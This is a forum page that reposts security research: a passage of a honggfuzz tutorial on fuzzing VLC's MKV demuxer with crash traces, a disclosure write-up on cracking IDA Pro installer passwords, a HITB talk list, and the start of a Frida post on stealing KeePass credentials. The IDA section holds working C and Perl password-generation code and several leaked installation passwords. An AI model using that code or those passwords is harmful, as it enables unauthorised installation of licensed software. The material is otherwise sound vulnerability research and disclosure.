-lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/x86_64-linux-gnu/8/crtend.o /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crtn.o" Apparently, something breaks the VLC_COMPILER variable and thus instrumentation fails. Let’s not give up, and proceed with the compilation using the following command: $ make clean $ CC=clang CXX=clang++ CFLAGS="-fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp" CXXFLAGS="-fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp" ./configure --enable-debug --with-sanitizer=address $ ASAN_OPTIONS=detect_leaks=0 make -j8 will give us the following output: GEN ../modules/plugins.dat make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/bin' Making all in test make[2]: Entering directory '/home/symeon/vlc-cov/covnavi/vlc/test' make[2]: Nothing to be done for 'all'. make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/test' make[2]: Entering directory '/home/symeon/vlc-cov/covnavi/vlc' GEN cvlc GEN rvlc GEN nvlc GEN vlc make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' make[1]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' Now although the compilation is successful, the binaries are missing honggfuzz’s instrumentation. As such, we need to remove the existing vlc_static binary, and manually link it with libhfuzz library. To do that, we need to figure out where linkage of the binary occurs. Let’s remove the vlc-static binary: $ cd bin $ rm vlc-static And run strace while compiling/linking the vlc-binary: $ ASAN_OPTIONS=detect_leaks=0 strace -s 1024 -f -o compilation_flags.log make CCLD vlc-static GEN ../modules/plugins.dat The above command, will specify the maximum string size to 1024 characters (default is 32), and will save all the output to specified file. Opening the log file and looking for “-o vlc-static” gives us the following result: -- snip -- 103391 <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 103392 103391 rt_sigprocmask(SIG_BLOCK, [HUP INT QUIT TERM XCPU XFSZ], NULL, 8) = 0 103391 vfork( <unfinished ...> 103393 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 103393 prlimit64(0, RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}, NULL) = 0 103393 execve("/bin/bash", ["/bin/bash", "-c", "echo \" CCLD \" vlc-static;../doltlibtool --silent --tag=CC --mode=link clang - DTOP_BUILDDIR=\\\"$(cd \"..\"; pwd)\\\" -DTOP_SRCDIR=\\\"$(cd \"..\"; pwd)\\\" -fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp -Werror=unknown-warning-option -Werror=invalid-command-line-argument -pthread -Wall -Wextra -Wsign-compare -Wundef -Wpointer-arith -Wvolatile-register-var -Wformat -Wformat-security -Wbad-function-cast -Wwrite-strings -Wmissing-prototypes -Werror-implicit-function-declaration -Winit-self -pipe -fvisibility=hidden -fsanitize=address -g -fsanitize-address-use-after-scope -fno-omit-frame-pointer -fno-math-errno -funsafe-math-optimizations -funroll-loops -fstack-protector-strong -no-install -static -fsanitize=address -o vlc-static vlc_static-vlc.o vlc_static-override.o ../lib/libvlc.la "], 0x5565fb56ae10 /* 59 vars */ <unfinished ...> 103391 <... vfork resumed> ) = 103393 103391 rt_sigprocmask(SIG_UNBLOCK, [HUP INT QUIT TERM XCPU XFSZ], NULL, 8) = 0 103391 wait4(-1, <unfinished ...> 103393 <... execve resumed> ) = 0 103393 brk(NULL) = 0x557581212000 Bingo! We managed to find the compilation flags and libraries that vlc-static requires. The final step is to link against libhfuzz.a’s library by issuing the following command: $ ~/vlc-coverage/bin$ ../doltlibtool --tag=CC --mode=link clang -DTOP_BUILDDIR="/home/symeon/vlc-coverage" -DTOP_SRCDIR="/home/symeon/vlc-coverage" -fsanitize-coverage=trace-pc-guard,trace-cmp -Werror=unknown-warning-option -Werror=invalid-command-line-argument -pthread -Wall -Wextra -Wsign-compare -Wundef -Wpointer-arith -Wvolatile-register-var -Wformat -Wformat-security -Wbad-function-cast -Wwrite-strings -Wmissing-prototypes -Werror-implicit-function-declaration -Winit-self -pipe -fvisibility=hidden -fsanitize=address -g -fsanitize-address-use-after-scope -fno-omit-frame-pointer -fno-math-errno -funsafe-math-optimizations -funroll-loops -fstack-protector-strong -no-install -static -o vlc-static vlc_static-vlc.o vlc_static-override.o ../lib/libvlc.la -Wl,--whole-archive -L/home/symeon/Desktop/honggfuzz/libhfuzz/ -lhfuzz -u,LIBHFUZZ_module_instrument -u,LIBHFUZZ_module_memorycmp -Wl,--no-whole-archive As a last step, let’s confirm that the vlc_static binary includes libhfuzz’s symbols: $ ~/vlc-coverage/bin$ nm vlc-static | grep LIBHFUZZ Figure 6: Examining the symbols and linkage of Libhfuzz.a library. Fuzzing it! For this part, we will be using one VM with 100GB RAM and 8 cores! Figure 7: Monster VM ready to fuzz VLC. With the instrumented binary, let’s copy it over to our ramdisk (/run/shm), copy over the samples and start fuzzing it! $ cp ./vlc-static /run/shm $ cp -r ./mkv_samples /run/shm Now fire it up as below, -f is the folder with our samples, and -F will limit to maximum 16kB. $ honggfuzz -f mkv_samples -t 5 -F 16536 -- ./vlc-static --play-and-exit --run-time=4 ___FILE___ If everything succeeds, you should be getting massive coverage for both edge and pc similar to the screenshot below: Figure 8: Honggfuzz fuzzing the instrumented binary and getting coverage information. Hopefully within few hours you should get your first crash, which can be found in the same directory where honggfuzz was executed (unless modified) along with a text file HONGGFUZZ.REPORT.TXT, with information such as honggfuzz arguments, date of the crash, fault instruction as well as well the stack trace. Figure 9: honggfuzz displaying information regarding the crash. Crash results/triaging After three days of fuzzing, honggfuzz discovered a few interesting crashes such as SIGSEV, SIGABRT, and SIGPFPE. Despite the name SIGABRT, running the crashers under AddressSanitizer (we have already instrumented VLC) revealed that these bugs were in fact mostly heap-based out-of-bounds read vulnerabilities. We can simply loop through the crashers with the previously instrumented binary using this simple bash script: $ cat asan_triage.sh #!/bin/bash FILES=/home/symeon/Desktop/crashers/* OUTPUT=asan.txt for f in $FILES do echo "[*] Processing $f file..." >> $OUTPUT 2>&1 ASAN_OPTIONS=detect_leaks=0,verbosity=1 timeout 12 ./vlc-static --play-and-exit --run-time=10 "$f" >>$OUTPUT 2>&1 done Figure 10: Quickly triaging the crashes honggfuzz found. Once you run it, you shouldn’t see any output since we redirecting all the output/errors to a file asan.txt. Quickly opening this file, it reveals the root cause of the crash, as well as symbolised stack traces where the crash occurred. $ cat asan.txt | grep AddressSanitizer -A 5 ==59237==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x02d000000000 in thread T5 #0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 #1 0x7f674f0e8610 in es_format_Clean /home/symeon/Desktop/vlc/src/misc/es_format.c:496:9 #2 0x7f672fde9dac in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:892:5 #3 0x7f672fc3f494 in std::default_delete<mkv::mkv_track_t>::operator()(mkv::mkv_track_t*) const /usr/lib/gcc/x86_64-linux- gnu/8/../../../../include/c++/8/bits/unique_ptr.h:81:2 #4 0x7f672fc3f2d0 in std::unique_ptr<mkv::mkv_track_t, std::default_delete<mkv::mkv_track_t> >::~unique_ptr() /usr/lib/gcc/x86_64-linux- gnu/8/../../../../include/c++/8/bits/unique_ptr.h:274:4 -- SUMMARY: AddressSanitizer: bad-free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 in __interceptor_free Thread T5 created by T4 here: #0 0x444dd0 in __interceptor_pthread_create /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors.cc:209:3 #1 0x7f674f15b6a1 in vlc_clone_attr /home/symeon/Desktop/vlc/src/posix/thread.c:421:11 #2 0x7f674f15b0ca in vlc_clone /home/symeon/Desktop/vlc/src/posix/thread.c:433:12 #3 0x7f674ef6e141 in input_Start /home/symeon/Desktop/vlc/src/input/input.c:200:25 -- ==59286==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000041fa0 at pc 0x7fabef0d00a7 bp 0x7fabf7074bd0 sp 0x7fabf7074bc8 READ of size 8 at 0x602000041fa0 thread T5 #0 0x7fabef0d00a6 in mkv::demux_sys_t::FreeUnused() /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34 #1 0x7fabef186e6e in mkv::Open(vlc_object_t*) /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:257:12 #2 0x7fac0e2b01b4 in demux_Probe /home/symeon/Desktop/vlc/src/input/demux.c:180:15 #3 0x7fac0e1f82b7 in module_load /home/symeon/Desktop/vlc/src/modules/modules.c:122:15 -- SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34 in mkv::demux_sys_t::FreeUnused() Shadow bytes around the buggy address: 0x0c04800003a0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c04800003b0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c04800003c0: fa fa fd fd fa fa 00 02 fa fa fd fd fa fa fd fd 0x0c04800003d0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 00 -- ==59343==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250016a7a4f at pc 0x0000004ab6da bp 0x7f75e5457b10 sp 0x7f75e54572c0 READ of size 128 at 0x6250016a7a4f thread T15 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7f75ece563c2 in lavc_CopyPicture /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:435:13 #2 0x7f75ece52ac3 in DecodeBlock /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1257:17 #3 0x7f75ece4d587 in DecodeVideo /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1354:12 -- SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 in __asan_memcpy Shadow bytes around the buggy address: 0x0c4a802ccef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a802ccf00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a802ccf10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a802ccf20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -- ==59411==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000716b4 at pc 0x0000004ab6da bp 0x7f97b4ea8290 sp 0x7f97b4ea7a40 READ of size 13104 at 0x6040000716b4 thread T5 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7f97aceb2858 in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_handler(char const*&, mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::HandlerPayload&) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1807:25 #2 0x7f97aceb1e7b in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_callback(char const*, void*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1783:9 #3 0x7f97ace4ed16 in (anonymous namespace)::StringDispatcher::send(char const* const&, void* const&) const /home/symeon/Desktop/vlc/modules/demux/mkv/string_dispatcher.hpp:128:13 -- SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 in __asan_memcpy Shadow bytes around the buggy address: 0x0c0880006280: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c0880006290: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c08800062a0: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 02 0x0c08800062b0: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 00 04 Fantastic! We have our PoCs, along with decent symbolised traces revealing the lines where the crash occurred! Reviewing/Increasing coverage Honggfuzz by default will save all the new samples that produce new coverage to the same folder with our samples (can be modified via the –covdir_all parameter). This is where things get interesting. Although we manged to discover a few vulnerabilities in our initial fuzzing, it’s time to run all the produced coverage again, and see which comparisons honggfuzz could not find (a.k.a magic values, maybe crc checksums or string comparisons). For this example, I will be re-running again the previously bash script, feeding all the *.cov file set. Figure 11: A total of 86254 files were saved during three days of fuzzing. As you can see above, a total of 86254 files were saved as they produced new paths. Now it’s time to iterate over those files again: Figure 12: Iterating over the .cov files honggfuzz produced to measure new coverage. Let’s re-run the coverage and see how much code we hit! Figure 13: Our improved coverage after iterating over the cov files honggfuzz produced. So after three days of fuzzing, we slightly bumped our overall coverage from 45.1% to 50%! Notice how the Ebml_parser.cpp from the initial 71.5% increased to 96.8% and in fact we were able to find some bugs on EBML parsing functionality while fuzzing .mkv files! What would be our next steps? How can we improve our coverage? After manually reviewing the coverage, it turns out functions such as void matroska_segment_c::ParseAttachments( KaxAttachments *attachments ) were never hit! Figure 14: Coverage showing no execution of the ParseAttachment code base. After a bit of research, it turns out that a tool named mkvpropedit can be used to add attachments to our sample files. Let’s try that: $ mkvpropedit SampleVideo_720x480_5mb.mkv --add-attachment '/home/symeon/Pictures/Screenshot from 2019-03-24 11-47-04.png' Figure 15: Adding attachments to an existing mkv file. Brilliant, this looks like it worked! Finally let’s confirm it by setting up a breakpoint on the relevant code, and run VLC with the new sample: Figure 16: Hitting our breakpoint and expanding our coverage! Excellent! We’ve managed to successfully create a new attachment and hit new functions within the mkv::matroska_segment codebase! Our next step would be similar to this technique, adjust the samples and freshly fuzz our target! Discovered vulnerabilities After running our fuzzing project for two weeks, as you can see from the following screenshot we performed a total 1 million executions (!), resulting in 1547 crashes of which 36 were unique. Figure 17: A unique 36 crashes after fuzzing VLC for 15 days! Figure 18: A double free vulnerability while parsing a malformed mkv file. Many crashes were divisions by zero, and null pointer dereferences. A few heap based out-of-bounds write were also discovered which were not able to reproduce reliably. However, the following five vulnerabilities were disclosed to the security team of VLC. 1. Double Free in mkv::mkv_track_t::~mkv_track_t() ==79009==ERROR: AddressSanitizer: attempting double-free on 0x602000048e50 in thread T5: mkv demux error: Couldn't allocate buffer to inflate data, ignore track 4 [000061100006a080] mkv demux error: Couldn't handle the track 4 compression #0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 #1 0x7fb7722c3b6f in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:895:5 #2 0x7fb77214ad4b in mkv::matroska_segment_c::ParseTrackEntry(libmatroska::KaxTrackEntry const*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:992:13 The above vulnerability was fixed with the release of VLC 3.0.7 based on the following commit: http://git.videolan.org/?p=vlc.git;a=commit;h=81023659c7de5ac2637b4a879195efef50846102. 2. Freeing on address which was not malloced in es_format_Clean. [000061100005ff40] mkv demux error: cannot load some cues/chapters/tags etc. (broken seekhead or file) [000061100005ff40] ================================================================= ==92463==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x02d000000000 in thread T5 mkv demux error: cannot use the segment #0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 #1 0x7f7470232230 in es_format_Clean /home/symeon/Desktop/vlc/src/misc/es_format.c:496:9 #2 0x7f7452f82a6c in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:892:5 #3 0x7f7452dd78e4 in std::default_delete<mkv::mkv_track_t>::operator()(mkv::mkv_track_t*) const /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/unique_ptr.h:81:2 3. Heap Out Of Bounds Read in mkv::demux_sys_t::FreeUnused() libva error: va_getDriverName() failed with unknown libva error,driver_name=(null) [00006060001d1860] decdev_vaapi_drm generic error: vaInitialize: unknown libva error [h264 @ 0x6190000a4680] top block unavailable for requested intra mode -1 [h264 @ 0x6190000a4680] error while decoding MB 10 0, bytestream 71 ================================================================= ==104180==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500082c24f at pc 0x0000004ab6da bp 0x7f6f5ac3faf0 sp 0x7f6f5ac3f2a0 READ of size 128 at 0x62500082c24f thread T8 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7f6f5ad1748f in lavc_CopyPicture /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:435:13 #2 0x7f6f5ad13b89 in DecodeBlock /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1259:17 #3 0x7f6f5ad0e537 in DecodeVideo /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1356:12 4. Heap Out Of Bounds Read in mkv::demux_sys_t::FreeUnused() [0000611000069f40] mkv demux error: No tracks supported ================================================================= ==81972==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000482c0 at pc 0x7f0a692c7a37 bp 0x7f0a6bf2ac10 sp 0x7f0a6bf2ac08 READ of size 8 at 0x6020000482c0 thread T7 #0 0x7f0a692c7a36 in mkv::demux_sys_t::FreeUnused() /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34 #1 0x7f0a6937eaf1 in mkv::Open(vlc_object_t*) /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:257:12 #2 0x7f0a86792691 in demux_Probe /home/symeon/Desktop/vlc/src/input/demux.c:180:15 #3 0x7f0a866d8d17 in module_load /home/symeon/Desktop/vlc/src/modules/modules.c:122:15 5. Heap Out Of Bounds Read in mkv::matroska_segment_c::TrackInit ================================================================= ==83326==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000b3134 at pc 0x0000004ab6da bp 0x7ffb4f076250 sp 0x7ffb4f075a00 READ of size 13104 at 0x6040000b3134 thread T7 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7ffb4d84008d in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_handler(char const*&, mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::HandlerPayload&) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1807:25 #2 0x7ffb4d83f6ab in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_callback(char const*, void*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1783:9 #3 0x7ffb4d7dc486 in (anonymous namespace)::StringDispatcher::send(char const* const&, void* const&) const /home/symeon/Desktop/vlc/modules/demux/mkv/string_dispatcher.hpp:128:13 Note: Some of those bugs were also previously discovered and disclosed via the HackerOne Bug Bounty, and the rest of the bugs have not been addressed as of now. Advanced fuzzing with libFuzz While searching for previous techniques, I stumbled upon this blog post, where one of the VLC developers used libFuzz to get deeper coverage. The developer used for example the vlc_stream_MemoryNew() (https://www.videolan.org/developers/vlc/doc/doxygen/html/stream__memory_8c.html)which reads data from the byte stream and fuzzed the demux process. As expected, he manged to find a few interesting vulnerabilities. This proves that the more effort you do to write your own harness and research your target, the better results (and bugs) you will get! Takeaways We started with zero knowledge of how VLC works, and we’ve learnt how to create a very simple harness based on the documentation (which was unsuccessful). We nevertheless continued with instrumenting VLC with honggfuzz, and although the standard process of instrumenting the binary didn’t work (hfuzz-clang), we were able to tweak a bit the parameters and successfully instrument the binary. We continued by gathering samples, compiled and linked VLC against the libhfuzz library adding coverage support, started the fuzzing process, got crashes and triaged our crashes! We were then able to measure our initial coverage and improve our samples increasing the overall coverage. Targeting only the .mkv format we saw that we were able to get a total of 50% coverage of the mkv file format. Remember that VLC supports a number of different video and audio file formats – sure enough there is still a lot of code that can be fuzzed! Finally, although we used a relatively fast VM for this project, it should be noted that even a slow 4GB VM can be used and give you bugs! Acknowledgements This blog post would not be possible without guidance from @robertswiecki, helping with the compilation and linkage process, as well as all giving me the tips and tricks described above in this guide. Finally, thanks @AlanMonie and @Yekki_1 for helping me with the fuzzing VM. VideoLAN have issued an advisory Sursa: https://www.pentestpartners.com/security-blog/double-free-rce-in-vlc-a-honggfuzz-how-to/
  16. Tech Editorials Operation Crack: Hacking IDA Pro Installer PRNG from an Unusual Way Advisory By Shaolin on 2019-06-21 English Version 中文版本 Introduction Today, we are going to talk about the installation password of Hex-Rays IDA Pro, which is the most famous decompiler. What is installation password? Generally, customers receive a custom installer and installation password after they purchase IDA Pro. The installation password is required during installation process. However, if someday we find a leaked IDA Pro installer, is it still possible to install without an installation password? This is an interesting topic. After brainstorming with our team members, we verified the answer: Yes! With a Linux or MacOS version installer, we can easily find the password directly. With a Windows version installer, we only need 10 minutes to calculate the password. The following is the detailed process: * Linux and MacOS version The first challenge is Linux and MacOS version. The installer is built with an installer creation tool called InstallBuilder. We found the plaintext installation password directly in the program memory of the running IDA Pro installer. Mission complete! This problem is fixed after we reported through Hex-Rays. BitRock released InstallBuilder 19.2.0 with the protection of installation password on 2019/02/11. * Windows version It gets harder on Windows version because the installer is built with Inno Setup, which store its password with 160-bit SHA-1 hash. Therefore, we cannot get the password simply with static or dynamic analyzing the installer, and brute force is apparently not an effective way. But the situation is different if we can grasp the methodology of password generation, which lets us enumerate the password more effectively! Although we have realized we need to find how Hex-Rays generate password, it is still really difficult, as we do not know what language the random number generator is implemented with. There are at least 88 random number generators known. It is such a great variation. We first tried to find the charset used by random number generator. We collected all leaked installation passwords, such as hacking team’s password, which is leaked by WikiLeaks. FgVQyXZY2XFk (link) 7ChFzSbF4aik (link) ZFdLqEM2QMVe (link) 6VYGSyLguBfi (link) From the collected passwords we can summarize the charset: 23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz The missing of 1, I, l, 0, O, o, N, n seems to make sense because they are confusing characters. Next, we guess the possible charset ordering like these: 23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz 23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789 ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789 Lastly, we picked some common languages(c/php/python/perl)to implement a random number generator and enumerate all the combinations. Then we examined whether the collected passwords appears in the combinations. For example, here is a generator written in C language: #include<stdio.h> #include<stdlib.h> char _a[] = "23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz"; char _b[] = "ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz"; char _c[] = "23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ"; char _d[] = "abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ"; char _e[] = "abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789"; char _f[] = "ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789"; int main() { char bufa[21]={0}; char bufb[21]={0}; char bufc[21]={0}; char bufd[21]={0}; char bufe[21]={0}; char buff[21]={0}; unsigned int i=0; while(i<0x100000000) { srand(i); for(size_t n=0;n<20;n++) { int key= rand() % 54; bufa[n]=_a[key]; bufb[n]=_b[key]; bufc[n]=_c[key]; bufd[n]=_d[key]; bufe[n]=_e[key]; buff[n]=_f[key]; } printf("%s\n",bufa); printf("%s\n",bufb); printf("%s\n",bufc); printf("%s\n",bufd); printf("%s\n",bufe); printf("%s\n",buff); i=i+1; } } After a month, we finally generated the IDA Pro installation passwords successfully with Perl, and the correct charset ordering is abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789. For example, we can generate the hacking team’s leaked password FgVQyXZY2XFk with the following script: #!/usr/bin/env perl # @_e = split //,"abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789"; $i=3326487116; srand($i); $pw=""; for($i=0;$i<12;++$i) { $key = rand 54; $pw = $pw . $_e[$key]; } print "$i $pw\n"; With this, we can build a dictionary of installation password, which effectively increase the efficiency of brute force attack. Generally, we can compute the password of one installer in 10 minutes. We have reported this issue to Hex-Rays, and they promised to harden the installation password immediately. Summary In this article, we discussed the possibility of installing IDA Pro without owning installation password. In the end, we found plaintext password in the program memory of Linux and MacOS version. On the other hand, we determined the password generation methodology of Windows version. Therefore, we can build a dictionary to accelerate brute force attack. Finally, we can get one password at a reasonable time. We really enjoy this process: surmise wisely and prove it with our best. It can broaden our experience no matter the result is correct or not. This is why we took a whole month to verify such a difficult surmise. We also take this attitude in our Red Team Assessment. You would love to give it a try! Lastly, we would like to thank for the friendly and rapid response from Hex-Rays. Although this issue is not included in Security Bug Bounty Program, they still generously awarded us IDA Pro Linux and MAC version, and upgraded the Windows version for us. We really appreciate it. Timeline Jan 31, 2019 - Report to Hex-Rays Feb 01, 2019 - Hex-Rays promised to harden the installation password and reported to BitRock Feb 11, 2019 - BitRock released InstallBuilder 19.2.0 Sursa: https://devco.re/blog/2019/06/21/operation-crack-hacking-IDA-Pro-installer-PRNG-from-an-unusual-way-en/
      • 1
      • Upvote
  17. Nu stiu despre ce e vorba cu acel CTI, eu am scris cate ceva aici, sper sa te ajute:
  18. #HITB2019AMS PRECONF PREVIEW - The End Is The Beginning Is The End: Ten Years In The NL Box Hack In The Box Security Conference #HITB2019AMS PRECONF PREVIEW - The Beginning of the End? A Return to the Abyss for a Quick Look Hack In The Box Security Conference #HITB2019AMS KEYNOTE: The End Is The Beginning Is The End: Ten Years In The NL Box - D. Kannabhiran Hack In The Box Security Conference #HITB2019AMS D1T1 - Make ARM Shellcode Great Again - Saumil Shah Hack In The Box Security Conference #HITB2019AMS D1T2 - Hourglass Fuzz: A Quick Bug Hunting Method - M. Li, T. Han, L. Jiang and L. Wu Hack In The Box Security Conference #HITB2019AMS D1T1 - TOCTOU Attacks Against Secure Boot And BootGuard - Trammell Hudson & Peter Bosch Hack In The Box Security Conference #HITB2019AMS D1T2 - Hidden Agendas: Bypassing GSMA Recommendations On SS7 Networks - Kirill Puzankov Hack In The Box Security Conference #HITB2019AMS D1T1 - Finding Vulnerabilities In iOS/MacOS Networking Code - Kevin Backhouse Hack In The Box Security Conference #HITB2019AMS D1T2 - fn_fuzzy: Fast Multiple Binary Diffing Triage With IDA - Takahiro Haruyama Hack In The Box Security Conference #HITB2019AMS D1T3 - How To Dump, Parse, And Analyze i.MX Flash Memory Chips - Damien Cauquil Hack In The Box Security Conference #HITB2019AMS D1T1 - The Birdman: Hacking Cospas-Sarsat Satellites - Hao Jingli Hack In The Box Security Conference #HITB2019AMS D1T2 - Duplicating Black Box Machine Learning Models - Rewanth Cool and Nikhil Joshi Hack In The Box Security Conference #HITB2019AMS D1T3 - Overcoming Fear: Reversing With Radare2 - Arnau Gamez Montolio Hack In The Box Security Conference #HITB2019AMS D1T1 - Deobfuscate UEFI/BIOS Malware And Virtualized Packers - Alexandre Borges Hack In The Box Security Conference #HITB2019AMS D1T2 - Researching New Attack Interfaces On iOS And OSX - Lilang Wu and Moony Li Hack In The Box Security Conference #HITB2019AMS D1T1 - A Successful Mess Between Hardening And Mitigation - Weichselbaum & Spagnuolo Hack In The Box Security Conference #HITB2019AMS D1T2 - For The Win: The Art Of The Windows Kernel Fuzzing - Guangming Liu Hack In The Box Security Conference #HITB2019AMS D1T3 - Attacking GSM - Alarms, Smart Homes, Smart Watches And More - Alex Kolchanov Hack In The Box Security Conference #HITB2019AMS D1T1 - SeasCoASA: Exploiting A Small Leak In A Great Ship - Kaiyi Xu and Lily Tang Hack In The Box Security Conference #HITB2019AMS D1T2 - H(ack)DMI: Pwning HDMI For Fun And Profit - Jeonghoon Shin and Changhyeon Moon Hack In The Box Security Conference #HITB2019AMS D1T1 - Pwning Centrally-Controlled Smart Homes - Sanghyun Park and Seongjoon Cho Hack In The Box Security Conference #HITB2019AMS D1T2 - Automated Discovery Of Logical Priv. Esc. Bugs In Win10 - Wenxu Wu and Shi Qin Hack In The Box Security Conference Sursa:
      • 1
      • Upvote
  19. Fun With Frida JamesFollow Jun 2 In this post, we’re going to take a quick look at Frida and use it to steel credentials from KeePass. According to their website, Frida is a “dynamic instrumentation framework”. Essentially, it allows us to inject into a running process then interact with that process via JavaScript. It’s commonly used for mobile app testing, but is supported on Windows, OSX and *Nix as well. KeePass is a free and open-source password manager with official builds for Windows, but unofficial releases exist for most Linux flavors. We are going to look at the latest official Windows version 2 release (2.42.1). To follow along, you will need Frida, KeePass and Visual Studio (or any other editor you want to load a .net project in). You will also need the KeePass source from https://keepass.info/download.html The first step is figuring out what we want to achieve. Like most password managers, KeePass protects stored credentials with a master password. This password is entered by the user and allows the KeePass database to be accessed. Once unlocked, usernames and passwords can be copied to the clipboard to allow them to be entered. Given that password managers allow the easy use of strong passwords, it’s a fairly safe assumption that users will be copying and pasting passwords. Lets take at look how KeePass interacts with the clipboard. After a bit of digging (hit: the search tool is your friend), we find some references to the “SetClipboardData” windows API call. It looks like KeePass is hooking the native Windows API to manage the clipboard. Looking at which calls reference 